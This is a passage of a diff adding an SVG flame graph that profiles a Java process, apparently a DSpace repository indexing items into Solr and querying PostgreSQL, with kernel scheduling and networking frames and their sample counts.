+<title>Interpreter (189 samples, 42.95%)</title><rect x="667.0" y="709" width="506.9" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="670.05" y="719.5" >Interpreter</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="782.4" y="293" width="2.6" height="15.0" fill="rgb(214,70,70)" rx="2" ry="2" />
+<text  x="785.36" y="303.5" ></text>
+</g>
+<g >
+<title>nf_nat_inet_fn (1 samples, 0.23%)</title><rect x="642.9" y="565" width="2.7" height="15.0" fill="rgb(211,66,66)" rx="2" ry="2" />
+<text  x="645.91" y="575.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1160.5" y="405" width="2.7" height="15.0" fill="rgb(225,87,87)" rx="2" ry="2" />
+<text  x="1163.50" y="415.5" ></text>
+</g>
+<g >
+<title>java/net/PlainSocketImpl:::socketSetOption0 (1 samples, 0.23%)</title><rect x="779.7" y="341" width="2.7" height="15.0" fill="rgb(76,224,76)" rx="2" ry="2" />
+<text  x="782.68" y="351.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$BmpCharProperty:::match (2 samples, 0.45%)</title><rect x="889.6" y="325" width="5.4" height="15.0" fill="rgb(59,209,59)" rx="2" ry="2" />
+<text  x="892.64" y="335.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/UpdateRequest:::writeXML (18 samples, 4.09%)</title><rect x="699.2" y="373" width="48.3" height="15.0" fill="rgb(98,244,98)" rx="2" ry="2" />
+<text  x="702.23" y="383.5" >org/..</text>
+</g>
+<g >
+<title>__x64_sys_futex (25 samples, 5.68%)</title><rect x="63.6" y="741" width="67.1" height="15.0" fill="rgb(224,85,85)" rx="2" ry="2" />
+<text  x="66.64" y="751.5" >__x64_s..</text>
+</g>
+<g >
+<title>__x64_sys_futex (8 samples, 1.82%)</title><rect x="219.2" y="741" width="21.4" height="15.0" fill="rgb(254,129,129)" rx="2" ry="2" />
+<text  x="222.18" y="751.5" >_..</text>
+</g>
+<g >
+<title>com/atmire/dspace/discovery/ItemCollectionPlugin:::additionalIndex (1 samples, 0.23%)</title><rect x="798.5" y="453" width="2.6" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="801.45" y="463.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::findByUnique (5 samples, 1.14%)</title><rect x="1050.5" y="453" width="13.5" height="15.0" fill="rgb(85,232,85)" rx="2" ry="2" />
+<text  x="1053.55" y="463.5" ></text>
+</g>
+<g >
+<title>load_balance (1 samples, 0.23%)</title><rect x="128.0" y="629" width="2.7" height="15.0" fill="rgb(200,51,51)" rx="2" ry="2" />
+<text  x="131.00" y="639.5" ></text>
+</g>
+<g >
+<title>org/dspace/browse/SolrBrowseCreateDAO:::additionalIndex (32 samples, 7.27%)</title><rect x="819.9" y="453" width="85.8" height="15.0" fill="rgb(59,208,59)" rx="2" ry="2" />
+<text  x="822.91" y="463.5" >org/dspace..</text>
+</g>
+<g >
+<title>do_syscall_64 (19 samples, 4.32%)</title><rect x="10.0" y="757" width="51.0" height="15.0" fill="rgb(202,53,53)" rx="2" ry="2" />
+<text  x="13.00" y="767.5" >do_sy..</text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (4 samples, 0.91%)</title><rect x="130.7" y="773" width="10.7" height="15.0" fill="rgb(246,117,117)" rx="2" ry="2" />
+<text  x="133.68" y="783.5" ></text>
+</g>
+<g >
+<title>__x64_sys_futex (19 samples, 4.32%)</title><rect x="10.0" y="741" width="51.0" height="15.0" fill="rgb(218,76,76)" rx="2" ry="2" />
+<text  x="13.00" y="751.5" >__x64..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="173.6" y="325" width="2.7" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="176.59" y="335.5" ></text>
+</g>
+<g >
+<title>Interpreter (189 samples, 42.95%)</title><rect x="667.0" y="629" width="506.9" height="15.0" fill="rgb(210,65,65)" rx="2" ry="2" />
+<text  x="670.05" y="639.5" >Interpreter</text>
+</g>
+<g >
+<title>sun/net/spi/DefaultProxySelector$3:::run (1 samples, 0.23%)</title><rect x="1090.8" y="293" width="2.7" height="15.0" fill="rgb(52,202,52)" rx="2" ry="2" />
+<text  x="1093.77" y="303.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.68%)</title><rect x="345.2" y="789" width="8.1" height="15.0" fill="rgb(207,61,61)" rx="2" ry="2" />
+<text  x="348.23" y="799.5" ></text>
+</g>
+<g >
+<title>pthread_cond_wait@@GLIBC_2.3.2 (8 samples, 1.82%)</title><rect x="195.0" y="789" width="21.5" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="198.05" y="799.5" >p..</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (10 samples, 2.27%)</title><rect x="1082.7" y="421" width="26.8" height="15.0" fill="rgb(83,230,83)" rx="2" ry="2" />
+<text  x="1085.73" y="431.5" >o..</text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (1 samples, 0.23%)</title><rect x="1128.3" y="197" width="2.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1131.32" y="207.5" ></text>
+</g>
+<g >
+<title>org/dspace/sort/OrderFormat:::makeSortString (4 samples, 0.91%)</title><rect x="895.0" y="437" width="10.7" height="15.0" fill="rgb(56,206,56)" rx="2" ry="2" />
+<text  x="898.00" y="447.5" ></text>
+</g>
+<g >
+<title>_register_finalizer_Java (1 samples, 0.23%)</title><rect x="908.4" y="405" width="2.7" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="911.41" y="415.5" ></text>
+</g>
+<g >
+<title>org/springframework/core/convert/support/DefaultConversionService:::addFallbackConverters (1 samples, 0.23%)</title><rect x="825.3" y="389" width="2.7" height="15.0" fill="rgb(106,251,106)" rx="2" ry="2" />
+<text  x="828.27" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::doReceiveResponse (1 samples, 0.23%)</title><rect x="1096.1" y="357" width="2.7" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="1099.14" y="367.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.68%)</title><rect x="168.2" y="549" width="8.1" height="15.0" fill="rgb(218,76,76)" rx="2" ry="2" />
+<text  x="171.23" y="559.5" ></text>
+</g>
+<g >
+<title>on_each_cpu_cond_mask (1 samples, 0.23%)</title><rect x="350.6" y="597" width="2.7" height="15.0" fill="rgb(252,126,126)" rx="2" ry="2" />
+<text  x="353.59" y="607.5" ></text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (1 samples, 0.23%)</title><rect x="669.7" y="405" width="2.7" height="15.0" fill="rgb(226,88,88)" rx="2" ry="2" />
+<text  x="672.73" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/util/ClientUtils:::writeXML (18 samples, 4.09%)</title><rect x="699.2" y="357" width="48.3" height="15.0" fill="rgb(55,205,55)" rx="2" ry="2" />
+<text  x="702.23" y="367.5" >org/..</text>
+</g>
+<g >
+<title>finish_task_switch (4 samples, 0.91%)</title><rect x="176.3" y="517" width="10.7" height="15.0" fill="rgb(210,65,65)" rx="2" ry="2" />
+<text  x="179.27" y="527.5" ></text>
+</g>
+<g >
+<title>sun/nio/cs/UTF_8$Decoder:::decode (1 samples, 0.23%)</title><rect x="919.1" y="389" width="2.7" height="15.0" fill="rgb(70,218,70)" rx="2" ry="2" />
+<text  x="922.14" y="399.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1055.9" y="293" width="2.7" height="15.0" fill="rgb(247,118,118)" rx="2" ry="2" />
+<text  x="1058.91" y="303.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (24 samples, 5.45%)</title><rect x="63.6" y="661" width="64.4" height="15.0" fill="rgb(235,102,102)" rx="2" ry="2" />
+<text  x="66.64" y="671.5" >finish_..</text>
+</g>
+<g >
+<title>org/apache/http/impl/io/ChunkedOutputStream:::flushCacheWithAppend (2 samples, 0.45%)</title><rect x="774.3" y="309" width="5.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="777.32" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::preProcess (2 samples, 0.45%)</title><rect x="790.4" y="373" width="5.4" height="15.0" fill="rgb(80,228,80)" rx="2" ry="2" />
+<text  x="793.41" y="383.5" ></text>
+</g>
+<g >
+<title>Ljava/lang/ref/Reference:::tryHandlePending (2 samples, 0.45%)</title><rect x="240.6" y="645" width="5.4" height="15.0" fill="rgb(108,253,108)" rx="2" ry="2" />
+<text  x="243.64" y="655.5" ></text>
+</g>
+<g >
+<title>exit_to_usermode_loop (4 samples, 0.91%)</title><rect x="176.3" y="565" width="10.7" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="179.27" y="575.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::callAppenders (3 samples, 0.68%)</title><rect x="1152.5" y="469" width="8.0" height="15.0" fill="rgb(81,229,81)" rx="2" ry="2" />
+<text  x="1155.45" y="479.5" ></text>
+</g>
+<g >
+<title>futex_wait (4 samples, 0.91%)</title><rect x="130.7" y="725" width="10.7" height="15.0" fill="rgb(241,109,109)" rx="2" ry="2" />
+<text  x="133.68" y="735.5" ></text>
+</g>
+<g >
+<title>java (312 samples, 70.91%)</title><rect x="353.3" y="821" width="836.7" height="15.0" fill="rgb(214,71,71)" rx="2" ry="2" />
+<text  x="356.27" y="831.5" >java</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.45%)</title><rect x="948.6" y="421" width="5.4" height="15.0" fill="rgb(81,229,81)" rx="2" ry="2" />
+<text  x="951.64" y="431.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$5:::isSatisfiedBy (2 samples, 0.45%)</title><rect x="978.1" y="53" width="5.4" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="981.14" y="63.5" ></text>
+</g>
+<g >
+<title>java/nio/charset/CharsetEncoder:::encode (1 samples, 0.23%)</title><rect x="688.5" y="293" width="2.7" height="15.0" fill="rgb(50,200,50)" rx="2" ry="2" />
+<text  x="691.50" y="303.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Ctype:::isSatisfiedBy (1 samples, 0.23%)</title><rect x="978.1" y="37" width="2.7" height="15.0" fill="rgb(60,210,60)" rx="2" ry="2" />
+<text  x="981.14" y="47.5" ></text>
+</g>
+<g >
+<title>nft_do_chain_inet (1 samples, 0.23%)</title><rect x="583.9" y="581" width="2.7" height="15.0" fill="rgb(226,87,87)" rx="2" ry="2" />
+<text  x="586.91" y="591.5" ></text>
+</g>
+<g >
+<title>call_stub (2 samples, 0.45%)</title><rect x="240.6" y="677" width="5.4" height="15.0" fill="rgb(247,118,118)" rx="2" ry="2" />
+<text  x="243.64" y="687.5" ></text>
+</g>
+<g >
+<title>java/lang/Throwable:::printStackTrace (2 samples, 0.45%)</title><rect x="680.5" y="309" width="5.3" height="15.0" fill="rgb(73,221,73)" rx="2" ry="2" />
+<text  x="683.45" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/DefaultThrowableRenderer:::render (2 samples, 0.45%)</title><rect x="680.5" y="325" width="5.3" height="15.0" fill="rgb(63,212,63)" rx="2" ry="2" />
+<text  x="683.45" y="335.5" ></text>
+</g>
+<g >
+<title>sun/net/spi/DefaultProxySelector$3:::run (1 samples, 0.23%)</title><rect x="1123.0" y="325" width="2.6" height="15.0" fill="rgb(102,247,102)" rx="2" ry="2" />
+<text  x="1125.95" y="335.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (4 samples, 0.91%)</title><rect x="130.7" y="661" width="10.7" height="15.0" fill="rgb(221,80,80)" rx="2" ry="2" />
+<text  x="133.68" y="671.5" ></text>
+</g>
+<g >
+<title>java/lang/StringBuilder:::append (3 samples, 0.68%)</title><rect x="806.5" y="453" width="8.0" height="15.0" fill="rgb(51,201,51)" rx="2" ry="2" />
+<text  x="809.50" y="463.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1171.2" y="325" width="2.7" height="15.0" fill="rgb(226,88,88)" rx="2" ry="2" />
+<text  x="1174.23" y="335.5" ></text>
+</g>
+<g >
+<title>_register_finalizer_Java (1 samples, 0.23%)</title><rect x="1160.5" y="421" width="2.7" height="15.0" fill="rgb(206,59,59)" rx="2" ry="2" />
+<text  x="1163.50" y="431.5" ></text>
+</g>
+<g >
+<title>strncpy (1 samples, 0.23%)</title><rect x="583.9" y="533" width="2.7" height="15.0" fill="rgb(231,96,96)" rx="2" ry="2" />
+<text  x="586.91" y="543.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match0 (1 samples, 0.23%)</title><rect x="1080.0" y="421" width="2.7" height="15.0" fill="rgb(80,227,80)" rx="2" ry="2" />
+<text  x="1083.05" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="170.9" y="437" width="5.4" height="15.0" fill="rgb(217,75,75)" rx="2" ry="2" />
+<text  x="173.91" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.45%)</title><rect x="937.9" y="389" width="5.4" height="15.0" fill="rgb(106,251,106)" rx="2" ry="2" />
+<text  x="940.91" y="399.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="240.6" y="693" width="5.4" height="15.0" fill="rgb(240,109,109)" rx="2" ry="2" />
+<text  x="243.64" y="703.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (8 samples, 1.82%)</title><rect x="219.2" y="629" width="21.4" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="222.18" y="639.5" >_..</text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestEntity (2 samples, 0.45%)</title><rect x="688.5" y="373" width="5.4" height="15.0" fill="rgb(108,253,108)" rx="2" ry="2" />
+<text  x="691.50" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/AbstractUpdateRequest:::process (15 samples, 3.41%)</title><rect x="1109.5" y="453" width="40.3" height="15.0" fill="rgb(54,204,54)" rx="2" ry="2" />
+<text  x="1112.55" y="463.5" >org..</text>
+</g>
+<g >
+<title>JVM_DoPrivileged (4 samples, 0.91%)</title><rect x="836.0" y="341" width="10.7" height="15.0" fill="rgb(214,71,71)" rx="2" ry="2" />
+<text  x="839.00" y="351.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.23%)</title><rect x="1066.6" y="325" width="2.7" height="15.0" fill="rgb(74,222,74)" rx="2" ry="2" />
+<text  x="1069.64" y="335.5" ></text>
+</g>
+<g >
+<title>nf_nat_ipv4_fn (1 samples, 0.23%)</title><rect x="624.1" y="421" width="2.7" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="627.14" y="431.5" ></text>
+</g>
+<g >
+<title>__local_bh_enable_ip (19 samples, 4.32%)</title><rect x="592.0" y="581" width="50.9" height="15.0" fill="rgb(206,59,59)" rx="2" ry="2" />
+<text  x="594.95" y="591.5" >__loc..</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%)</title><rect x="1055.9" y="405" width="2.7" height="15.0" fill="rgb(64,213,64)" rx="2" ry="2" />
+<text  x="1058.91" y="415.5" ></text>
+</g>
+<g >
+<title>__rcu_read_lock (1 samples, 0.23%)</title><rect x="600.0" y="453" width="2.7" height="15.0" fill="rgb(201,52,52)" rx="2" ry="2" />
+<text  x="603.00" y="463.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (2 samples, 0.45%)</title><rect x="937.9" y="341" width="5.4" height="15.0" fill="rgb(78,225,78)" rx="2" ry="2" />
+<text  x="940.91" y="351.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObject:::getMetadata (6 samples, 1.36%)</title><rect x="916.5" y="453" width="16.0" height="15.0" fill="rgb(53,203,53)" rx="2" ry="2" />
+<text  x="919.45" y="463.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.68%)</title><rect x="1066.6" y="405" width="8.1" height="15.0" fill="rgb(103,248,103)" rx="2" ry="2" />
+<text  x="1069.64" y="415.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/spring/SpringServiceManager:::getServicesByType (28 samples, 6.36%)</title><rect x="970.1" y="437" width="75.1" height="15.0" fill="rgb(78,226,78)" rx="2" ry="2" />
+<text  x="973.09" y="447.5" >org/dspa..</text>
+</g>
+<g >
+<title>native_write_msr (4 samples, 0.91%)</title><rect x="299.6" y="613" width="10.8" height="15.0" fill="rgb(217,75,75)" rx="2" ry="2" />
+<text  x="302.64" y="623.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (3 samples, 0.68%)</title><rect x="1141.7" y="373" width="8.1" height="15.0" fill="rgb(76,224,76)" rx="2" ry="2" />
+<text  x="1144.73" y="383.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="240.6" y="725" width="5.4" height="15.0" fill="rgb(209,64,64)" rx="2" ry="2" />
+<text  x="243.64" y="735.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRow:::canonicalizeAndCheck (1 samples, 0.23%)</title><rect x="1163.2" y="437" width="2.7" height="15.0" fill="rgb(62,211,62)" rx="2" ry="2" />
+<text  x="1166.18" y="447.5" ></text>
+</g>
+<g >
+<title>__alloc_skb (1 samples, 0.23%)</title><rect x="659.0" y="661" width="2.7" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="662.00" y="671.5" ></text>
+</g>
+<g >
+<title>__schedule (4 samples, 0.91%)</title><rect x="299.6" y="677" width="10.8" height="15.0" fill="rgb(238,105,105)" rx="2" ry="2" />
+<text  x="302.64" y="687.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolingDataSource$PoolGuardConnectionWrapper:::prepareStatement (1 samples, 0.23%)</title><rect x="1058.6" y="421" width="2.7" height="15.0" fill="rgb(105,251,105)" rx="2" ry="2" />
+<text  x="1061.59" y="431.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::trim (1 samples, 0.23%)</title><rect x="803.8" y="453" width="2.7" height="15.0" fill="rgb(94,240,94)" rx="2" ry="2" />
+<text  x="806.82" y="463.5" ></text>
+</g>
+<g >
+<title>java/lang/Class:::getMethod (2 samples, 0.45%)</title><rect x="841.4" y="277" width="5.3" height="15.0" fill="rgb(86,233,86)" rx="2" ry="2" />
+<text  x="844.36" y="287.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (2 samples, 0.45%)</title><rect x="782.4" y="325" width="5.3" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="785.36" y="335.5" ></text>
+</g>
+<g >
+<title>VerifyClassname (1 samples, 0.23%)</title><rect x="897.7" y="373" width="2.7" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="900.68" y="383.5" ></text>
+</g>
+<g >
+<title>call_stub (2 samples, 0.45%)</title><rect x="841.4" y="309" width="5.3" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="844.36" y="319.5" ></text>
+</g>
+<g >
+<title>java/io/FileOutputStream:::writeBytes (1 samples, 0.23%)</title><rect x="1155.1" y="389" width="2.7" height="15.0" fill="rgb(59,208,59)" rx="2" ry="2" />
+<text  x="1158.14" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/pool/impl/GenericObjectPool:::borrowObject (2 samples, 0.45%)</title><rect x="1168.5" y="437" width="5.4" height="15.0" fill="rgb(61,210,61)" rx="2" ry="2" />
+<text  x="1171.55" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/logging/impl/SLF4JLocationAwareLog:::isDebugEnabled (1 samples, 0.23%)</title><rect x="763.6" y="373" width="2.7" height="15.0" fill="rgb(66,215,66)" rx="2" ry="2" />
+<text  x="766.59" y="383.5" ></text>
+</g>
+<g >
+<title>simple_copy_to_iter (1 samples, 0.23%)</title><rect x="538.3" y="677" width="2.7" height="15.0" fill="rgb(254,128,128)" rx="2" ry="2" />
+<text  x="541.32" y="687.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%)</title><rect x="956.7" y="373" width="2.7" height="15.0" fill="rgb(108,253,108)" rx="2" ry="2" />
+<text  x="959.68" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (4 samples, 0.91%)</title><rect x="1139.0" y="389" width="10.8" height="15.0" fill="rgb(60,209,60)" rx="2" ry="2" />
+<text  x="1142.05" y="399.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (21 samples, 4.77%)</title><rect x="484.7" y="773" width="56.3" height="15.0" fill="rgb(203,54,54)" rx="2" ry="2" />
+<text  x="487.68" y="783.5" >do_sy..</text>
+</g>
+<g >
+<title>tcp_v4_rcv (7 samples, 1.59%)</title><rect x="605.4" y="421" width="18.7" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="608.36" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::callAppenders (2 samples, 0.45%)</title><rect x="680.5" y="389" width="5.3" height="15.0" fill="rgb(102,248,102)" rx="2" ry="2" />
+<text  x="683.45" y="399.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (1 samples, 0.23%)</title><rect x="347.9" y="693" width="2.7" height="15.0" fill="rgb(216,74,74)" rx="2" ry="2" />
+<text  x="350.91" y="703.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1144.4" y="133" width="2.7" height="15.0" fill="rgb(200,50,50)" rx="2" ry="2" />
+<text  x="1147.41" y="143.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.23%)</title><rect x="1168.5" y="325" width="2.7" height="15.0" fill="rgb(219,77,77)" rx="2" ry="2" />
+<text  x="1171.55" y="335.5" ></text>
+</g>
+<g >
+<title>nf_hook_slow (4 samples, 0.91%)</title><rect x="575.9" y="597" width="10.7" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="578.86" y="607.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (1 samples, 0.23%)</title><rect x="1074.7" y="437" width="2.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1077.68" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="173.6" y="373" width="2.7" height="15.0" fill="rgb(208,62,62)" rx="2" ry="2" />
+<text  x="176.59" y="383.5" ></text>
+</g>
+<g >
+<title>futex_wait (8 samples, 1.82%)</title><rect x="219.2" y="725" width="21.4" height="15.0" fill="rgb(213,69,69)" rx="2" ry="2" />
+<text  x="222.18" y="735.5" >f..</text>
+</g>
+<g >
+<title>start_thread (2 samples, 0.45%)</title><rect x="240.6" y="805" width="5.4" height="15.0" fill="rgb(247,119,119)" rx="2" ry="2" />
+<text  x="243.64" y="815.5" ></text>
+</g>
+<g >
+<title>__libc_recv (22 samples, 5.00%)</title><rect x="482.0" y="805" width="59.0" height="15.0" fill="rgb(224,85,85)" rx="2" ry="2" />
+<text  x="485.00" y="815.5" >__libc..</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (1 samples, 0.23%)</title><rect x="932.5" y="373" width="2.7" height="15.0" fill="rgb(104,250,104)" rx="2" ry="2" />
+<text  x="935.55" y="383.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="1141.7" y="325" width="5.4" height="15.0" fill="rgb(247,118,118)" rx="2" ry="2" />
+<text  x="1144.73" y="335.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/ItemIdIterator:::next (1 samples, 0.23%)</title><rect x="1165.9" y="485" width="2.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1168.86" y="495.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (1 samples, 0.23%)</title><rect x="785.0" y="293" width="2.7" height="15.0" fill="rgb(237,105,105)" rx="2" ry="2" />
+<text  x="788.05" y="303.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (189 samples, 42.95%)</title><rect x="667.0" y="757" width="506.9" height="15.0" fill="rgb(247,119,119)" rx="2" ry="2" />
+<text  x="670.05" y="767.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.23%)</title><rect x="948.6" y="309" width="2.7" height="15.0" fill="rgb(77,225,77)" rx="2" ry="2" />
+<text  x="951.64" y="319.5" ></text>
+</g>
+<g >
+<title>pthread_cond_wait@@GLIBC_2.3.2 (48 samples, 10.91%)</title><rect x="353.3" y="789" width="128.7" height="15.0" fill="rgb(251,124,124)" rx="2" ry="2" />
+<text  x="356.27" y="799.5" >pthread_cond_wai..</text>
+</g>
+<g >
+<title>finish_task_switch (8 samples, 1.82%)</title><rect x="219.2" y="661" width="21.4" height="15.0" fill="rgb(224,85,85)" rx="2" ry="2" />
+<text  x="222.18" y="671.5" >f..</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRow:::setColumn (1 samples, 0.23%)</title><rect x="1074.7" y="421" width="2.7" height="15.0" fill="rgb(81,228,81)" rx="2" ry="2" />
+<text  x="1077.68" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="294.3" y="789" width="5.3" height="15.0" fill="rgb(214,71,71)" rx="2" ry="2" />
+<text  x="297.27" y="799.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (4 samples, 0.91%)</title><rect x="1179.3" y="725" width="10.7" height="15.0" fill="rgb(253,127,127)" rx="2" ry="2" />
+<text  x="1182.27" y="735.5" ></text>
+</g>
+<g >
+<title>__schedule (16 samples, 3.64%)</title><rect x="248.7" y="677" width="42.9" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="251.68" y="687.5" >__sc..</text>
+</g>
+<g >
+<title>org/dspace/eperson/Group:::find (1 samples, 0.23%)</title><rect x="964.7" y="453" width="2.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="967.73" y="463.5" ></text>
+</g>
+<g >
+<title>ip_finish_output2 (21 samples, 4.77%)</title><rect x="586.6" y="597" width="56.3" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="589.59" y="607.5" >ip_fi..</text>
+</g>
+<g >
+<title>[unknown] (18 samples, 4.09%)</title><rect x="246.0" y="805" width="48.3" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="249.00" y="815.5" >[unk..</text>
+</g>
+<g >
+<title>futex_wait_queue_me (8 samples, 1.82%)</title><rect x="219.2" y="709" width="21.4" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="222.18" y="719.5" >f..</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRow:::resetChanged (1 samples, 0.23%)</title><rect x="1165.9" y="437" width="2.6" height="15.0" fill="rgb(59,208,59)" rx="2" ry="2" />
+<text  x="1168.86" y="447.5" ></text>
+</g>
+<g >
+<title>java/lang/Class:::forName0 (1 samples, 0.23%)</title><rect x="897.7" y="389" width="2.7" height="15.0" fill="rgb(91,238,91)" rx="2" ry="2" />
+<text  x="900.68" y="399.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (4 samples, 0.91%)</title><rect x="130.7" y="629" width="10.7" height="15.0" fill="rgb(253,127,127)" rx="2" ry="2" />
+<text  x="133.68" y="639.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (1 samples, 0.23%)</title><rect x="935.2" y="309" width="2.7" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="938.23" y="319.5" ></text>
+</g>
+<g >
+<title>__poll (1 samples, 0.23%)</title><rect x="1147.1" y="325" width="2.7" height="15.0" fill="rgb(248,119,119)" rx="2" ry="2" />
+<text  x="1150.09" y="335.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (6 samples, 1.36%)</title><rect x="1173.9" y="773" width="16.1" height="15.0" fill="rgb(207,61,61)" rx="2" ry="2" />
+<text  x="1176.91" y="783.5" ></text>
+</g>
+<g >
+<title>java/lang/StringCoding:::encode (3 samples, 0.68%)</title><rect x="747.5" y="389" width="8.0" height="15.0" fill="rgb(73,221,73)" rx="2" ry="2" />
+<text  x="750.50" y="399.5" ></text>
+</g>
+<g >
+<title>Ljava/lang/ref/Reference$ReferenceHandler:::run (2 samples, 0.45%)</title><rect x="240.6" y="661" width="5.4" height="15.0" fill="rgb(57,206,57)" rx="2" ry="2" />
+<text  x="243.64" y="671.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.23%)</title><rect x="1128.3" y="261" width="2.7" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
